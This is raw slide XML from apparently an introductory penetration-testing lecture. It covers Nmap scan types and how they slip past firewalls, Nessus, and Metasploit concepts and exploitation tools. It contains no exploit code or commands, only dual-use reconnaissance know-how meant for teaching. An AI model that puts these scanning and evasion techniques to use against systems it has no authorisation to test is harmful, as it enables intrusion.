              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>RST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>packet is received, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>closed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>no response, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1"/>
              <a:t>|filtered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>ICMP unreachable error (type 3, code 1, 2, 3, 9, 10, or 13) received, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>filtered</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3651080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 Xmas Tree, and Null Scan</a:t>
            </a:r>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PRO: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>they can sneak through certain non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stateful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> firewalls and packet filtering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>routers, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a little more stealthy than even a SYN scan.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CON: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>not all systems follow RFC 793 to the letter. A number of systems send RST responses to the probes regardless of whether the port is open or not. This causes all of the ports to be labeled closed.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3421624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ACK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Not determines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>open (or even </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>open|filtered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ports, but firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rulesets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, determining whether </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>they are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stateful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or not and which ports are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>filtered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PRO: Determines filtered from unfiltered ports.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CON: Won’t tell if the port is open or closed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="179949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457200"/>
            <a:ext cx="8229600" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="DDDDDD"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Why Penetration Testing?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23555" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="1676400"/>
            <a:ext cx="6934200" cy="4191000"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="49001"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Computer related crime is on the rise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Find holes now before somebody else does.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Report problems to management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Verify secure configurations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Security training for network staff.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Discover gaps in compliance.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Testing new technology.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23556" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="6019800"/>
            <a:ext cx="3389313" cy="4000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solidFill>
                  <a:srgbClr val="0000EC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>(Source: Northcutt et al., 2006)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29700" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="1447800"/>
            <a:ext cx="8001000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800" cmpd="dbl">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054333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Screen shot 2015-02-18 at 9.55.3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775" y="333375"/>
            <a:ext cx="8931275"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3778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Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Window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t>Same as ACK scan, but more details</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PRO: Can tell if a port is open or closed, whereas the ACK scan cannot.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CON: works on only a few OS’s, and sometimes acts flaky.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1997072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descr="Screen shot 2015-02-18 at 9.56.1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765175"/>
            <a:ext cx="9174163" cy="613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1618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NESSUS – Vulnerability Scan</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a:t>‪Introduction To Using The Nessus Vulnerability Scanner‬	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=-7ThbeAMqkw</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3383725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Metaploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -- overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1412875"/>
            <a:ext cx="8229600" cy="5445125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>=j-r5uFmuioA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="126409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1603375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" altLang="zh-TW" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684213" y="3657600"/>
            <a:ext cx="7848600" cy="2671763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4716463" y="2420938"/>
            <a:ext cx="26217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latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84376040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Exploitation Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Armitage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Medusa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>John the Ripper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Password Resetting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Macof</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="341845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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Terms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MSF console</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189820914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888"/>
            <a:ext cx="8229600" cy="1139825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395288" y="1196975"/>
            <a:ext cx="8569325" cy="4862513"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> Project's best-known creation, is a software platform for developing, testing, and executing exploits. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>It is formal structure for developing and launching exploits. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Frameworks assist the development process by providing organization and guidelines for how the various pieces are assembled and interact with each other.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180659275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5888"/>
            <a:ext cx="8229600" cy="1009650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Module </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34925" y="1196975"/>
            <a:ext cx="9109075" cy="4718050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Framework is composed of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploits defined </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>as modules that use payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An exploit without a payload is an Auxiliary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Framework includes hundreds of auxiliary modules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that perform scanning, fuzzing, sniffing, and much more. Although these modules will not give you a shell, they are extremely valuable when conducting a penetration test.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30549546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457200"/>
            <a:ext cx="7848600" cy="1603375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
